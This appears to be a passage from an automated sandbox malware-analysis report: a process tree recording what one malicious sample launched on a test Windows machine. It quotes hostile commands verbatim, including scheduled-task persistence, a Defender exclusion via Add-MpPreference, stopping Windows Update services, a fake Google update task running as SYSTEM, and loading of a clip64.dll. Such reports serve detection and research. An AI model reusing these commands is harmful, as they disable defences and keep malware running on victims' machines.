PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe

"C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 324 -ip 324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 324 -s 588

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3300 -ip 3300

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1424 -ip 1424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2F39.tmp\2F3A.tmp\2F3B.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffe4ae346f8,0x7ffe4ae34708,0x7ffe4ae34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffe4ae346f8,0x7ffe4ae34708,0x7ffe4ae34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,9503094431007173937,12839974700246991723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9503094431007173937,12839974700246991723,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\A9D7.exe

C:\Users\Admin\AppData\Local\Temp\A9D7.exe

C:\Users\Admin\AppData\Local\Temp\C33C.exe

C:\Users\Admin\AppData\Local\Temp\C33C.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kx4St2pf.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kx4St2pf.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IB0tc6CQ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IB0tc6CQ.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ok8bG1wv.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ok8bG1wv.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FG2wS5ol.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FG2wS5ol.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1OG42Qe5.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1OG42Qe5.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\D86B.bat

"C:\Users\Admin\AppData\Local\Temp\D86B.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5748 -ip 5748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\DBE7.exe

C:\Users\Admin\AppData\Local\Temp\DBE7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5424 -ip 5424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2816 -ip 2816

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DA3E.tmp\DA3F.tmp\DA40.bat C:\Users\Admin\AppData\Local\Temp\D86B.bat"

C:\Users\Admin\AppData\Local\Temp\DE3A.exe

C:\Users\Admin\AppData\Local\Temp\DE3A.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 544

C:\Users\Admin\AppData\Local\Temp\E0BB.exe

C:\Users\Admin\AppData\Local\Temp\E0BB.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4308 -ip 4308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 388

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2hH861vm.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2hH861vm.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe4ae346f8,0x7ffe4ae34708,0x7ffe4ae34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4ae346f8,0x7ffe4ae34708,0x7ffe4ae34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1992 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=168 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1ECF.exe

C:\Users\Admin\AppData\Local\Temp\1ECF.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\B35F.exe

C:\Users\Admin\AppData\Local\Temp\B35F.exe

C:\Users\Admin\AppData\Local\Temp\B5A2.exe

C:\Users\Admin\AppData\Local\Temp\B5A2.exe

C:\Users\Admin\AppData\Local\Temp\B8D0.exe

C:\Users\Admin\AppData\Local\Temp\B8D0.exe

C:\Users\Admin\AppData\Roaming\wvtwddb

C:\Users\Admin\AppData\Roaming\wvtwddb

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4316 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=B5A2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4ae346f8,0x7ffe4ae34708,0x7ffe4ae34718

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1924 /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=B5A2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4cde46f8,0x7ffe4cde4708,0x7ffe4cde4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11745534208124428805,13146771085866959325,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,11745534208124428805,13146771085866959325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2560 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,11745534208124428805,13146771085866959325,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

